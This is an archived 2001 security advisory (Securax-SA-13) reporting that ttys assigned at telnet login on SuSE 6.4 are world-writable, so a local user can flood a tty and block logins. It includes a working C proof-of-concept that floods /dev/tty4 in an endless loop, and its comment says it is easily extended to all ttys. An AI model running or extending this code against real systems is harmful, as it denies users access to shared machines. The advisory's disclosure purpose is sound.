TUCoPS :: Linux :: SUSE

TUCoPS :: Linux :: SUSE :: sax13.txt
SuSE 6.4 - all tty's can be written to when connecting


=============================================================================
Securax-SA-13                                               Security
Advisory
belgian.networking.security
Dutch
=============================================================================
Topic:          all tty's can be written to when connecting
Announced:      2001-01-01
Affects:        SuSE linux 6.4
                probably all versions of unix (not tested)
=============================================================================


Note: This  entire  advisory has been based upon trial and error
      results. We can not ensure the information below is 100% correct
      being that we have no  source  code  to audit.  This document is
      subject to change without prior notice.

I.  Problem Description
-----------------------

when someone telnets to a unix system, the tty that will be assigned to
him will be writable for any user on the system. However, when he is
logged in, his tty will not be writable for all users. So if someone
would write data to a tty that is currently used by someone who's
logging in, that person won't be able to log in.

II. Impact
----------

The impact can be pretty severe, allowing no one to log in. the Proof of
concept code I created will demonstrate this, but only on 1 given tty, this
was done for 2 basic reasons, 1 so the kiddies can't play to much with this
code and seconde that this was written in less than 5 minutes (there was a
lack of time)

/*
 * ttwrite.c
 * ---------
 *
 * written by ROOT-dude
 *
 * ok, this code is pretty shitty, but it works
 * so far it's only set to flood tty4, but with a
 * little modification, you can flood all tty's.
 * I made this limitation so the kiddies can't
 * play to much !!!  (THIS IS ONLY PROOF OF
 * CONCEPT CODE !!!!)
 *
 * I found this bug when I was messing around
 * with this tool I found, called m0000h.sh
 * which did the same but for /dev/pts,
 * (that still isn't fixed btw) only "prob" is
 * pts is for pseudo terminals, so a normal
 * remote telnet connection will get a tty assinged
 * and not a pts !!!!
 *
 * greetZ to :: incubus, f0bic, F_F, nostalgic,
 * t-omicron, zym0t1c, tosh, vorlon, cicero,
 * zoa, demongirl, so many others i forgot ...
 *
 * oh, yea, I nor the securax crew can't he held
 * respronsible for any use or misuse of this
 * source in any way, form, OR shape !
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

#define string "aaaaaaaaaa"

main()
{
 int fd;
 char tty[25];

 bzero(tty, sizeof(tty));
 strcat(tty, "/dev/tty4"); /* change to tty you want */
 fd = open(tty, O_WRONLY);
 while(fd < 0)
 {
  fd = open(tty, O_WRONLY);
 }

 while(fd)
 {
 write(fd, string, sizeof(string));
 }

 close(fd); /* no need to close it, but we'll code it anyway !*/

}

III.  Solution
--------------

So far the only solution I've come up with is to close telnet, and others
servers like it !

IV.   Credits
-------------

greetZ to :: incubus, f0bic, F_F, nostalgic, t-omicron, zym0t1c, tosh,
vorlon, cicero, zoa, demongirl, so many others I forgot ...

-R00T-dude(root@htw.zzn.com or ilja@securax.org).


============================================================================
=
For more information
ilja@securax.org
Website
http://www.securax.org

http://www.hexyn.be
Advisories/Text
http://www.securax.org/pers

http://www.hexyn.be/sections.php?op=listarticles&secid=1
----------------------------------------------------------------------------
-